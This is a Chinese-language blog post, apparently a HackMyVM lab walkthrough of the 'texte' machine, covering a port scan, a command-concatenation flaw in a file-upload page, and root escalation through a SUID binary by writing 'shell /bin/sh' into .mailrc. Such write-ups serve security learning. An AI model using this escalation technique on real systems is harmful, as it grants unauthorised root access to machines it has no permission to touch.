<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="hack-my-vm-texte  端口探测  123456789101112kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.244                                [18:49:09][sudo] kali 的密码：Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap">
<meta property="og:type" content="article">
<meta property="og:title" content="hack-my-vm-texte">
<meta property="og:url" content="http://example.com/2025/04/24/hack-my-vm-texte/index.html">
<meta property="og:site_name" content="WangYiHao">
<meta property="og:description" content="hack-my-vm-texte  端口探测  123456789101112kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.244                                [18:49:09][sudo] kali 的密码：Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/1.png">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/2.png">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/3.png">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/4.png">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/5.png">
<meta property="og:image" content="http://example.com/2025/04/24/hack-my-vm-texte/6.png">
<meta property="article:published_time" content="2025-04-24T10:46:59.000Z">
<meta property="article:modified_time" content="2025-04-24T11:29:03.083Z">
<meta property="article:author" content="SunRT">
<meta property="article:tag" content="HACK-MY-VM">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/04/24/hack-my-vm-texte/1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>hack-my-vm-texte</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 7.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
         
          <li><a href="/tags/Vulhub">VHub</a></li>
         
          <li><a href="/tags/WEB-%E5%AE%89%E5%85%A8">WEB-安全</a></li>
         
          <li><a href="/tags/%E5%BA%94%E6%80%A5">应急响应</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2025/04/28/%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-webshell%E6%9F%A5%E6%9D%80/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2025/04/23/hack-my-vm-attack/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/24/hack-my-vm-texte/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/24/hack-my-vm-texte/&text=hack-my-vm-texte"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/24/hack-my-vm-texte/&is_video=false&description=hack-my-vm-texte"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=hack-my-vm-texte&body=Check out this article: http://example.com/2025/04/24/hack-my-vm-texte/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/24/hack-my-vm-texte/&name=hack-my-vm-texte&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/24/hack-my-vm-texte/&t=hack-my-vm-texte"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text"> hack-my-vm-texte</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.1.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.2.</span> <span class="toc-text">端口渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.3.</span> <span class="toc-text">提权</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        hack-my-vm-texte
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">SunRT</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-24T10:46:59.000Z" itemprop="datePublished">2025-04-24</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/HACK-MY-VM/" rel="tag">HACK-MY-VM</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 align="center"> hack-my-vm-texte</h1>

<h2>端口探测</h2>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.244                                [18:49:09]</span><br><span class="line">[sudo] kali 的密码：</span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 18:49 CST</span><br><span class="line">Nmap scan report for 192.168.134.244</span><br><span class="line">Host is up (0.023s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (conn-refused)</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line">MAC Address: 08:00:27:DC:5B:8E (Oracle VirtualBox virtual NIC)</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds</span><br></pre></td></tr></table></figure>

<h2>端口渗透</h2>

<p><strong>80端口就是常规的文件上传，这里尝试了很多，无法上传php文件，我们换了一个思路，上传张图片先看看</strong></p>
<p><img src="/2025/04/24/hack-my-vm-texte/1.png" alt="1"></p>
<p><strong>可以上传，但是和常规的不太一样，这里直接展示了图片，而且base64过，结合lunix系统，我们猜测就是执行了base64命令</strong></p>
<p><img src="/2025/04/24/hack-my-vm-texte/2.png" alt="2"></p>
<p><strong>果然是命令的拼接问题，这里反弹shell一直执行失败，也无法尝试写入php文件，因为我们权限很低，是要root才能写入的，所以我们查看上面给出的最奇怪的文件</strong></p>
<p><img src="/2025/04/24/hack-my-vm-texte/3.png" alt="3"></p>
<p><strong>不像加密值，倒是很想用户名和密码，我们直接登录，就上去了</strong></p>
<h2>提权</h2>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kamila@texte:~$ sudo -l</span><br><span class="line">-bash: sudo: command not found</span><br></pre></td></tr></table></figure>

<p><strong>sudo没有，先跑一个脚本</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">══════════════════════╣ Files with Interesting Permissions ╠══════════════════════</span><br><span class="line">                      ╚════════════════════════════════════╝</span><br><span class="line">╔══════════╣ SUID - Check easy privesc, exploits and write perms</span><br><span class="line">╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid</span><br><span class="line">strace Not Found</span><br><span class="line">-rwsr-sr-x 1 root kamila 16K Oct  8  2021 /opt/texte (Unknown SUID binary!)</span><br><span class="line">-rwsr-xr-- 1 root messagebus 50K Feb 21  2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">-rwsr-xr-x 1 root root 522K Mar 13  2021 /usr/lib/openssh/ssh-keysign</span><br></pre></td></tr></table></figure>

<p><strong>这个&#x2F;opt&#x2F;texte肯定有问题的，我们先执行一下</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">kamila@texte:/opt$ ./texte </span><br><span class="line">Cc: asdasd</span><br><span class="line">asda</span><br><span class="line"></span><br><span class="line">(Interrupt -- one more to kill letter)</span><br><span class="line"> </span><br><span class="line">kamila@texte:/opt$ </span><br></pre></td></tr></table></figure>

<p><strong>没看懂，发现有r权限，传回来逆向一下</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">kamila@texte:/opt$ ls -la</span><br><span class="line">total 24</span><br><span class="line">drwxr-xr-x  2 root root    4096 Oct  8  2021 .</span><br><span class="line">drwxr-xr-x 18 root root    4096 Oct  8  2021 ..</span><br><span class="line">-rwsr-sr-x  1 root kamila 15560 Oct  8  2021 texte</span><br></pre></td></tr></table></figure>

<p><img src="/2025/04/24/hack-my-vm-texte/4.png" alt="4"></p>
<p><strong>主要是执行了一个mail命令，想了很多，劫持啊啥的，最后都不行，在man手册里面找到了东西</strong></p>
<p><img src="/2025/04/24/hack-my-vm-texte/5.png" alt="5"></p>
<p><img src="/2025/04/24/hack-my-vm-texte/6.png" alt="6"></p>
<p><strong>可以包含任何有效的shell结构</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">kamila@texte:~$ echo &quot;shell /bin/sh&quot; &gt; .mailrc</span><br><span class="line">kamila@texte:~$ /opt/texte</span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(kamila)</span><br><span class="line"># </span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
         
          <li><a href="/tags/Vulhub">VHub</a></li>
         
          <li><a href="/tags/WEB-%E5%AE%89%E5%85%A8">WEB-安全</a></li>
         
          <li><a href="/tags/%E5%BA%94%E6%80%A5">应急响应</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text"> hack-my-vm-texte</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.1.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.2.</span> <span class="toc-text">端口渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.3.</span> <span class="toc-text">提权</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/24/hack-my-vm-texte/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/24/hack-my-vm-texte/&text=hack-my-vm-texte"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/24/hack-my-vm-texte/&is_video=false&description=hack-my-vm-texte"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=hack-my-vm-texte&body=Check out this article: http://example.com/2025/04/24/hack-my-vm-texte/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/24/hack-my-vm-texte/&title=hack-my-vm-texte"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/24/hack-my-vm-texte/&name=hack-my-vm-texte&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/24/hack-my-vm-texte/&t=hack-my-vm-texte"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    SunRT
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">总览</a></li>
         
          <li><a href="/tags/WEB-CTF/">CTF-WEB</a></li>
         
          <li><a href="/tags/PWN/">CTF-PWN</a></li>
         
          <li><a href="/tags/HACK-MY-VM/">HACK-MY-VM</a></li>
         
          <li><a href="/tags/try-hack-me/">TRY-HACK-ME</a></li>
         
          <li><a href="/tags/Vulhub">VHub</a></li>
         
          <li><a href="/tags/WEB-%E5%AE%89%E5%85%A8">WEB-安全</a></li>
         
          <li><a href="/tags/%E5%BA%94%E6%80%A5">应急响应</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
